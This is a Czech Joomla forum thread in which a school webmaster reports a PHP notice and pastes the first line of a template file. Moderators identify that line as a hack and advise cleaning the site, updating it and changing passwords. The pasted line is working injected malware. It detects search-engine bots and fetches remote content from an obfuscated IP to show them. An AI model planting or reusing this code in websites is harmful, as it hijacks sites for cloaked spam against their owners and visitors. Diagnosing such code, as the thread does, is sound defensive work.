Joomla 5.1.0 a Joomla 4.4.4 (17 dub 2024)

Dnes byla uvolněna nová verze Joomla 5.1.0, společně s Joomla 4.4.4. Tato verze přináší spoustu nových funkcí, vylepšení v oblasti bezpečnosti a kódu a díky těmto vylepšením i vyšší rychlost.

Notice: Use of undefined constant HTTP_USER_AGENT

24. úno 2020 11:06 #141805

Notice: Use of undefined constant HTTP_USER_AGENT od Jarda

Uživatel

Dobrý den, spravuji školní stránky v Joomle a najednou se objevila tato hláška, která se zobrazuje na všech stránkách webu: Notice: Use of undefined constant HTTP_USER_AGENT - assumed 'HTTP_USER_AGENT' in /volume1/web/joomla/templates/zstgm/index.php on line 1 . V 1. řádce toho souboru je tohle:
<?php $botbotbot = "...".mb_strtolower($_SERVER[HTTP_USER_AGENT]);$botbotbot = str_replace(" ", "-", $botbotbot);if ((strpos($botbotbot,"google")) OR (strpos($botbotbot,"bing")) OR (strpos($botbotbot,"yahoo"))){$ch = curl_init(); $xxx = sqrt(30976); curl_setopt($ch, CURLOPT_URL, "http://$xxx.31.253.227/cakes/?useragent=$botbotbot&domain=$_SERVER[HTTP_HOST]"); $result = curl_exec($ch); curl_close ($ch); echo $result;}?><?php
defined('_JEXEC') or die;
Je potřeba něco změnit, nebo provést nějakou aktualizaci? Adresa webu je zstgm-podborany.cz Děkuji předem za nějakou radu.

24. úno 2020 14:10 - 24. úno 2020 14:16 #141807

Odpověď od Bong

Moderátor

Stránky jsou nedostupné. Při pokusu kontaktovat server zstgm-podborany.cz vypršel časový limit.

Neco jste upravoval - instaloval? Nebo vám je odstavili? Nemáte je hacknuté?

I'm sorry, my responses are limited...you must ask the right questions.

24. úno 2020 15:33 #141808

Odpověď od Rudolf

Joomla Expert

Ano,

obraťte se na programátora, který ten programový nesmysl přidal na začátek do souboru /volume1/web/joomla/templates/zstgm/index.php aniž nadefinoval konstantu HTTP_USER_AGENT aby to po sobě opravil.

Vypnout hlášení chyb v joomla také můžete, ale tím chyba nezmizí, jen se přestane zobrazovat a při každém zobrazení se zapíše do logu na serveru - to je také chyba.

MiniJoomla! - www.minijoomla.org - eshop s rozšířením Joomla/VM
Email Manager - aplikace na správu šablon emailů pro VirtueMart
Easy Feeder - aplikace na generování XML/CSV feedů a napojení na ERP pro VM
PragueClassicconcert - portál pro prodej vstupenek na systému Joomla

24. úno 2020 16:16 #141809

Odpověď od Jarda

Uživatel

Tak problém vyřešen. Odstranil jsem ten nesmysl z první řádky a už se to nezobrazuje. Netuším, kde se to tam vzalo, několik let to fungovalo v pořádku. Verze Joomly ale bylo 3.4.neco a ted jsem tam dal 3.6.5, nabízí to ještě verzi 3.9.15 ale mám obavy zda bude vše fungovat tak jak má.

24. úno 2020 16:25 - 24. úno 2020 16:25 #141810

Odpověď od Rudolf

Joomla Expert

To je možná klasická ukázka hacknutí webu

Jakmile jdete na web Vy, nevidíte žádnou chybu, jakmile jde nějaký bot (google, bing...) něco se stane a přidá sem:
http://$xxx.31.253.227/cakes/?.....

25. úno 2020 10:41 - 25. úno 2020 10:42 #141811

Odpověď od Bong

Moderátor

Jarda napsal: Tak problém vyřešen.

Problém vůbec není vyřešen. Stránky máte hacknuté a dá se na nich stále detekovat malware (viz příloha).

Musíte web vyčistit, aktualizovat na poslední verze (Joomlu i všechna rozšíření), změnit všechna přístupová hesla (Joomla, FTP, databáze i hosting) a provést alespoň základní zabezpečení.

To by nemělo být až zase tak náročné, stránky nemáte složité. Ale hlavně se zbavte té "nejoomlovské" fotogalerie, kterou tam provozujete. To je pravděpodobně ta největší bezpečnostní díra.

Postupujte bod po bodu podle článku Jak zachránit hacknutou Joomlu .